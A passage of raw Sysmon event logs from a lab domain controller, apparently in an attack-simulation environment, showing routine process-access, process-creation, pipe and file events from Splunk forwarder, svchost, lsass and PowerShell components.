M32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002854Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002853Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002852Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002851Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.065{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002850Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.065{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6483-6064-6E00-00000000AE01}3092C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002849Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.065{266CAFBE-647D-6064-2F00-00000000AE01}27963792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6483-6064-6E00-00000000AE01}3092C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002848Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:07.067{266CAFBE-6483-6064-6E00-00000000AE01}3092C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\perfmon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002942Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.799{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002941Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.533{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6484-6064-7100-00000000AE01}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002940Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.520{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6484-6064-7100-00000000AE01}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002939Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.520{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002938Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.520{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002937Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.520{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002936Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.520{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002935Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.520{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002934Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.520{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002933Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.520{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002932Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.520{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002931Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.520{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002930Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.520{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6484-6064-7100-00000000AE01}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002929Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.520{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6484-6064-7100-00000000AE01}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002928Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.304{266CAFBE-6484-6064-7100-00000000AE01}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe8.0.2Remote Performance monitor using WMIsplunk ApplicationSplunk Inc.splunk-wmi.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002927Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.410{266CAFBE-646A-6064-0B00-00000000AE01}856896C:\Windows\system32\lsass.exe{266CAFBE-6484-6064-7200-00000000AE01}4296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002926Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.410{266CAFBE-646A-6064-0B00-00000000AE01}856896C:\Windows\system32\lsass.exe{266CAFBE-6484-6064-7200-00000000AE01}4296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002925Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:08.377{266CAFBE-6484-6064-7200-00000000AE01}4296\PSHost.132616656683152351.4296.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002924Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.377{266CAFBE-6484-6064-7200-00000000AE01}4296NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_55eahudr.0mn.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002923Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.362{266CAFBE-6484-6064-7200-00000000AE01}4296NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_o1b1kcgw.zcv.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002922Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:08.362{266CAFBE-6484-6064-7200-00000000AE01}4296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_o1b1kcgw.zcv.ps12021-03-31 12:01:08.362 10341000x80000000000000002921Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 